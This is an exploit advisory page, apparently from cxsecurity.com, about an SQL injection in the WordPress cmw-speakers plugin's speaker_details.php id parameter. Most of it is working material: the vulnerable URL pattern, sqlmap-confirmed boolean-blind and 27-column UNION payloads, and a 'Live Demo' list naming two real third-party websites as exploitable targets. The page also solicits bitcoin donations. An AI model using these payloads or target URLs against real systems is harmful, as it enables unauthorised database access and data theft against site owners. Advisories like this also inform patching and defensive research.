Wordpress cmw-speakers Plugin SQL injection Vulnerability

2017.01.14
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|----------------------------| | [xBADGIRL21] | | [N3W PUBLIC 3XPL0IT] | | _,________ | | 0day _T _==____() -- | | /##(_)-' | | /##/ | | x21 | |----------------------------| | Exploit Title : Wordpress cmw-speakers Plugin SQL injection Vulnerability | Exploit Author : xBADGIRL21 | Dork : N/A in PUBLISH VERSION | version : ALL | Tested on: [ WINDOWS] | MyBlog : http://xbadgirl21.blogspot.com/ | Date: 13/01/2017 | video Proof : https://youtu.be/Bqnf4Eyniqc | To buy or Danate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz |-------------------- | [+] Poc : | |-------------------- | [id] Get Parameter Vulnerable To SQLi | http://127.0.0.1/wp-content/plugins/cmw-speakers/speaker_details.php?id=[SQLi] |-------------------- | [+] SQLmap PoC: | |-------------------- | --- | Parameter: id (GET) | Type: boolean-based blind | Title: AND boolean-based blind - WHERE or HAVING clause | Payload: id=97 AND 8158=8158 | | Type: UNION query | Title: Generic UNION query (NULL) - 27 columns | Payload: id=-9178 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N | ULL,NULL,NULL,CONCAT(0x716a786b71,0x6d5342665a52696145434b4c694e546e61445972684f | 415a415845655a7a6f647658667459454b77,0x7171627a71),NULL,NULL,NULL,NULL,NULL,NULL |,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Srfj | --- | [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable | GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N |-------------------- | [!] Live Demo : | |-------------------- |1) http://cmw.net/radio/wp-content/plugins/cmw-speakers/speaker_details.php?id=9 |2) http://digitalmediasummit.ca/wp-content/plugins/cmw-speakers/speaker_details.php?id=375 |----------------------------------------------- | Discovered by : xBADGIRL21 | | Greetz : All Mauritanien Hackers - NoWhere | +----------------------------------------------+

References:

https://youtu.be/Bqnf4Eyniqc


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top